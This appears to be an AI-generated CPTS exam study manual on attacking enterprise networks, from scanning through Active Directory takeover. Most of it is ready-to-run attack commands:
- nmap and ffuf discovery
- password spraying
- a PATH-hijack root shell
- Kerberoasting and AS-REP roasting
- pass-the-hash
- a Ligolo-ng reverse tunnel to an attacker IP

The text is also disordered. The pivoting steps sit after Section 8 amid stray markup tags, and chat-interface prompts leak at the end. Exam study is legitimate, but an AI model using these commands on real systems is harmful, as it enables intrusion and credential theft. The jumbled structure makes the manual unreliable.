The Encyclopedia of CPTS: Advanced Enterprise Architecture and Exploitation Manual
Section 1: Architectural Foundations and the Interconnected Network Chain
Modern corporate network environments do not rely on single systems. They use interconnected, multi tiered architectures where directory services, database backends, application servers, and network storage solutions communicate constantly. The Certified Penetration Testing Specialist (CPTS) evaluation simulates this environment. It does not test isolated vulnerabilities. It requires you to discover, analyze, and exploit a complex web of architectural relationships.
An operator must view the target network as an interdependent graph. A minor flaw on an external facing system, such as an unauthenticated file share or an information disclosure vulnerability in a web application, provides the initial data points needed to compromise a low privilege system user. From that initial foothold, you must extract local configuration files, analyze system memory, and map active network paths to escalate privileges or move laterally.
+───────────────────────────────────────────────────────────────────────────+
│ THE PROPAGATION CYCLE │
+───────────────────────────────────────────────────────────────────────────+
│ │
│ [Phase 1: External Reconnaissance] │
│ │ │
│ ▼ │
│ [Phase 2: Initial Access & Foothold] ──> (Harvest Local Accounts/Hashes) │
│ │ │
│ ▼ │
│ [Phase 4: Network Pivot Setup] <─── [Phase 3: Local Privilege Escalation]│
│ │ │
│ ▼ │
│ [Phase 5: Internal Network Discovery] │
│ │ │
│ ▼ │
│ [Phase 6: Active Directory Domination] ──> (Domain Wide Control) │
│ │
+───────────────────────────────────────────────────────────────────────────+
Every compromised asset serves as an informational platform. You must query its active connections, review its configuration history, and use its trusted network position to pivot into segmented zones that are completely inaccessible from the outside.
—
Section 2: Exhaustive Reconnaissance and Infrastructure Fingerprinting
Rushed network discovery leads directly to missed attack paths. High value enterprise systems are frequently hidden behind non standard port configurations, restrictive firewall policies, and intrusion detection appliances designed to disrupt automated tools.
Asynchronous Network Discovery Protocol
To ensure full coverage across large address spaces without missing hidden services or dropping connections due to network congestion, split your network mapping into three distinct phases.
The first phase utilizes asynchronous SYN scanning to sweep all sixty five thousand five hundred thirty five TCP ports at an elevated speed. This identifies live ports immediately while bypassing common ping drop filters.
nmap -sS -Pn -p- --min-rate 10000 --max-retries 2 -oA nmap_all_ports_raw 10.129.20.0/24
The second phase extracts those exact open ports from the raw log files and conducts deep programmatic service fingerprinting, banner analysis, and safe default script interrogation.
nmap -sC -sV -p21,22,80,135,443,445,1433,3389,5985,8080,8443 -Pn -oA nmap_deep_services 10.129.20.0/24
The third phase targets critical infrastructure UDP services. These ports often handle background management data, such as domain name resolution, network time synchronization, or configuration backups.
nmap -sU --top-ports 250 --min-rate 2000 --max-retries 1 -Pn -oA nmap_udp_services 10.129.20.0/24
Service Specific Enumeration Mechanics
Web Applications and Virtual Host Resolution
Enterprise web infrastructure often routes traffic to multiple isolated internal applications using a single IP address by filtering incoming requests based on the HTTP Host header. If an IP address displays a default web server landing page during initial scanning, you must fuzz for alternative virtual hosts to uncover staging platforms or hidden development portals.
ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1mil-5000.txt -u http://10.129.20.10/ -H "Host: FUZZ.target.local" -fs 15152
Once a valid virtual host is confirmed, directory and file extension fuzzing must be tailored to the underlying web technology stack. Enforce recursive discovery down to two layers deep to capture hidden files, backups, and old configuration endpoints.
ffuf -w /usr/share/wordlists/dirb/big.txt -u http://app.target.local/FUZZ -e .php,.txt,.xml,.json,.config,.bak,.old -recursion -recursion-depth 2 -v -o web_fuzz_results.json
Server Message Block (SMB) Structural Analysis
Server Message Block endpoints are primary targets due to overly permissive access control entries applied to network file storage. You must check the entire target block for null sessions or default guest access permissions across all discovered file systems.
netexec smb 10.129.20.0/24 -u '' -p '' --shares
netexec smb 10.129.20.0/24 -u 'guest' -p '' --shares
When an accessible share is identified, dump its file structure recursively to a local text file rather than browsing folders manually. This allows you to run precise regular expression queries to locate passwords, database strings, or backup archives.
smbclient //10.129.20.10/Data -N -c 'recurse ON; prompt OFF; dir' > smb_files.txt
grep -Ei 'pass|user|cred|conf|db|backup|key|token|secret' smb_files.txt
Lightweight Directory Access Protocol (LDAP) Interrogation
If an Active Directory domain controller permits anonymous binding, you can pull the schema of the entire domain before establishing a shell on any system. First, execute a base query to resolve the exact domain distinguished name layout.
ldapsearch -x -H ldap://10.129.20.20 -s base namingContexts
Use the recovered base parameters to map out all active domain users, system descriptions, and group mappings, outputting the text directly for local parsing.
ldapsearch -x -H ldap://10.129.20.20 -b "DC=target,DC=local" "(objectClass=user)" sAMAccountName description memberOf > ldap_users.txt
—
Section 3: Active Directory User Spraying and Validation Protocols
Once domain user lists are compiled from your enumeration data, you can begin password validation operations. The CPTS exam requires precise execution to avoid locking user accounts and triggering defensive alerts.
[Analyze Domain User List]
│
▼
[Query Active Password Policy]
(Check BadPwdCount and Lockout)
│
▼
[Enforce Safe Spray Interval]
(1 Guess Per Account Per Cycle)
│
▼
┌───────────────────────────────┐
│ Verify Remote Service Access │
└──────────────┬────────────────┘
│
┌───────┴───────┐
▼ ▼
[ WinRM ] [ MSSQL ]
(Instant Shell) (Database Admin)
Password Spraying Protocol
Before sending a password guess to a domain controller, you must identify the account lockout threshold policy. If a policy locks accounts after five failed attempts, you must limit your automated sprays to a single attempt within that lockout window.
netexec smb 10.129.20.20 -u 'anonymous' -p '' --pass-pol
Once the safety boundaries are established, spray a highly targeted corporate formatted password across your clean user list.
netexec smb 10.129.20.20 -u users.txt -p 'Spring2026!' --continue-on-success
Remote Service Access Verification
When a successful authentication match is flagged, verify where that user has remote management capabilities across the network segment.
netexec winrm 10.129.20.0/24 -u 'bsmith' -p 'Spring2026!'
netexec mssql 10.129.20.0/24 -u 'bsmith' -p 'Spring2026!'
netexec ssh 10.129.20.0/24 -u 'bsmith' -p 'Spring2026!'
—
Section 4: Post Exploitation and Local Privilege Escalation
Landing a basic user terminal shell is an intermediate step. You must immediately shift focus to dissecting the underlying operating system environment to elevate your execution context to an administrative level.
Linux Local Privilege Escalation Engineering
When inspecting a Linux shell, check the environment configuration files, kernel runtime flags, and custom automation scripts.
Path Manipulation and SUID Traversal
Look for binaries that carry the SUID bit, which allows them to execute with the security permissions of the file owner (root).
find / -perm -4000 -type f 2>/dev/null
If a custom application binary is discovered, analyze its execution strings to see if it makes calls to standard system utilities like cat, echo, or chmod without explicitly specifying their absolute filesystem path.
strings /opt/custom_backup
If it references cat instead of /bin/cat, you can prepend the temporary folder to your system PATH variable, write a malicious bash script named cat inside that temporary folder, and execute the SUID binary to trigger root execution.
echo "/bin/bash" > /tmp/cat
chmod +x /tmp/cat
export PATH=/tmp:$PATH
Internal Network Listener Mapping
Many administration panels, databases, or local services are bound strictly to the local loopback adapter, making them invisible during external port scans. Always inspect active sockets directly from the shell.
ss -lntp
Windows Local Privilege Escalation Engineering
Elevating privileges on Windows systems requires assessing system access tokens, registry stores, and unquoted paths configuration flaws.
Token Privileges Analysis
Analyze the explicit administrative capabilities assigned to your current execution thread.
whoami /priv
If the output confirms the presence of SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege, the system configuration is vulnerable to token exploitation. You can launch tools like PrintSpoofer or GodPotato to trick a local system service into authenticating against an interior named pipe, allowing you to intercept and adopt an NT AUTHORITY\SYSTEM security token.
Unquoted Service Interception
Search for active system services where the executable binary path contains spaces and lacks protective quotation marks encapsulation.
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """
If a service resolves to the unquoted path C:\Program Files\Staging Tools\Runner Engine\service.exe, the Windows sub layer api will attempt to parse the path step by step. You can intercept the execution chain by dropping a malicious executable named Staging.exe directly into C:\Program Files, which will run the next time the system or service initiates.
—
Section 5: Active Directory Infrastructure Domination
Enterprise active directory networks rely on Kerberos tickets, object access control lists (ACLs), and complex group inheritance rules.
Active Directory Attack Matrix
| Attack Vector | Underlying Cause | Tactical Execution Tool |
|---|
| AS-REP Roasting | Accounts missing Kerberos pre-authentication requirements. | impacket-GetNPUsers |
| Kerberoasting | High privilege service accounts map to active SPNs. | impacket-GetUserSPNs |
| Pass-the-Hash | NTLM authentication allowed across network endpoints. | impacket-wmiexec |
| ACL Abuse | Over permissive descriptors like GenericAll or WriteDacl. | PowerView / BloodHound |
Direct Domain Exploitation Syntax
AS-REP Roasting Operations
If a domain user account does not require Kerberos pre-authentication, any network operator can request an authentication ticket and receive an encrypted hash that can be cracked entirely offline.
impacket-GetNPUsers target.local/ -no-pass -usersfile users.txt -format hashcat -outputfile asrep.hashes
Kerberoasting Operations
Service Principal Names link domain service accounts to explicit service systems. You can request a Ticket Granting Service ticket for these accounts using any valid low privilege domain credentials, then pull down the crackable material.
impacket-GetUserSPNs target.local/lowuser:Password123 -request -outputfile kerberoast.hashes
Pass the Hash Authentication
Active Directory environments often allow users to authenticate using their raw NTLM hash directly, completely removing the need to clear or decrypt the underlying plaintext password.
impacket-wmiexec -hashes :aad3b435b51404eeaad3b435b51404ee:5846786a3434376b3261623334563461 Administrator@10.129.20.10
BloodHound Structural Analysis
When processing an Active Directory domain map inside BloodHound, focus on relationship edges.
If a path reveals a GenericAll relationship from a group you control to a target user object, you can directly modify that target account properties or reset its password.
If a path reveals a WriteDacl edge, you can alter the security descriptor of the object to grant your current account full control permissions (GenericAll), allowing you to execute further escalation actions.
—
Section 6: Network Pivoting and Layer 3 Tunneling Mechanics
Internal network segmentation blocks direct traffic from your primary attack platform to back end systems. Pivoting configures compromised hosts to act as network routers.
Layer 3 Tunneling via Ligolo-ng
Ligolo-ng is a high performance tunneling tool that sets up a dedicated TUN/TAP interface on your attack machine. This allows you to route raw network traffic directly into isolated subnets without using configuration wrappers like ProxyChains.
[ Attacking Machine ] [ Pivot Host ] [ Internal Subnet ]
(10.10.14.50) (Dual-Homed) (Internal IP Range)
│ │ │
│─── [Launch Proxy Server] ─────────┤ │
│ (Listening on port 11601) │ │
│ │ │
│ │─── [Run Agent Binary] ─────────┤
│<── [Establishes Reverse Tunnel] ─┤ (Connects back to Proxy) │
│ │ │
│ │ │
[Create TUN Interface] │ │
[Add System Route to 172.16.5.0/24] │ │
│ │ │
│═════════ [ Route Raw Traffic Through Tunnel ] ───────────────────>│
Pivot Configuration Process
—
Section 7: Commercial Grade Vulnerability Reporting
The final deliverable of a professional engagement is the penetration testing report. Technical success must be documented with absolute clarity to provide commercial value.
Finding Entry Schema Example
Vulnerability Name: Insecure Storage of Active Directory Domain Credentials
Vulnerability Classification: Information Disclosure / Broken Access Control
Vulnerability Severity: High Risk
CVSS v3.1 Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Detailed Description
The internal file storage appliance located at 10.129.20.5 hosts a Server Message Block share named Development that permits unauthenticated read capabilities to any network session. A recursive investigation of this file structure revealed a cleartext database connection string containing valid domain service credentials stored inside a production environment configuration file.
Step by Step Proof of Concept
First, connect to the exposed network share using an anonymous login session to verify open access.
smbclient //10.129.20.5/Development -N
Navigate into the staging directory tree and download the active application configuration file directly to your local filesystem.
get config.json
Read the text contents of the configuration file to extract the cleartext authentication parameters.
{
"db_host": "172.16.5.30",
"db_user": "svc_sql_admin",
"db_pass": "P@ssword!2026"
}
Comprehensive Remediation Steps
First, update the access control lists on the Development file share to require explicit authentication, completely disabling anonymous and guest read privileges.
Second, remove all plain text passwords, cryptographic keys, and hardcoded connection variables from production configuration files and source code repositories.
Third, migrate all sensitive enterprise operational credentials into a centralized, encrypted secrets management vault such as Windows Credential Manager or HashiCorp Vault.
—
Section 8: Mental Management and Operational Safety Boundaries
The CPTS exam network requires significant mental endurance. Tunnel vision is the primary reason otherwise talented engineers fail.
If you spend more than two consecutive hours executing a single exploit against a specific port without receiving a new information token or access shell, force yourself to close that terminal tab.
Revert to your primary documentation notes, inspect alternative ports on different hosts, and review your compiled credential lists to find missed opportunities for lateral movement. Document every action cleanly as it occurs to maintain complete control over the engagement structure.
—
- Initialize the Interface and Proxy Server: Executed on Attack Linux Machine.
Create a local virtual tunnel interface, configure it to look for incoming traffic, and spin up the main Ligolo-ng proxy listener:
sudo ip tuntap add dev ligolo mode tun
sudo ip link set dev ligolo up
./ligolo-proxy -laddr 0.0.0.0:11601
</Step>
<Step subtitle=“Executed on Compromised Windows Target” title=“Launch the Agent Payload”>
Transfer the lightweight agent binary onto your initial target foothold and execute a reverse connection back to your attacking server:
cmd
agent.exe -connect 10.10.14.50:11601 -ignore-cert
</Step>
<Step subtitle=“Executed on Attack Linux Machine” title=“Configure System Routing Tables”>
Once the agent session registers successfully in your proxy interface terminal, map the newly discovered target subnet into your attack host’s routing infrastructure:
bash
# Inside the Ligolo proxy console, select the session and start the tunnel
session 1
start
In a separate system terminal, route traffic to the internal subnet through the new interface
sudo ip route add 172.16.5.0/24 dev ligolo
</Step>
<Step subtitle=“Executed on Attack Linux Machine” title=“Launch Direct Internal Attacks”>
You can now run standard scanning and exploitation tools directly against internal assets without using any proxy chains:
bash
nmap -sS -Pn -p 445,3389,5985 172.16.5.15
</Step>
</Sequence><ElicitationsGroup message=“Which advanced technical section would you like to investigate further?”>
{/* Reason: Offers highly focused, specialized next steps based on the comprehensive manual context. */}
<Elicitation label=“Review manual PowerView AD enumeration syntax” query=“Provide a comprehensive cheat sheet of manual PowerView PowerShell commands for identifying high-value targets, tracking group inheritances, and mapping domain object ACLs.”/>
<Elicitation label=“Deep dive into Linux SUID and capabilities escalation” query=“Provide a detailed operational guide on identifying and exploiting custom SUID binaries and Linux capabilities, including practical walkthrough examples.”/>
<Elicitation label=“Explore advanced double pivoting configurations via Chisel” query=“Provide an exact network architecture guide and command execution workflow for configuring a multi-tier double pivot tunnel using Chisel and ProxyChains.”/>
</ElicitationsGroup>
